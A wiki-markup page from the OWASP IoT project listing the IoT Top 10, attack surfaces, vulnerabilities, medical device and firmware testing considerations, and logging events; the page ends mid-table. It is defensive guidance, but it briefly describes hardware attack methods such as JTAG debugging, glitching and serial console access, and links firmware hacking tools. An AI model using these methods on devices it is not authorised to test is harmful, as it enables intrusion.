Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
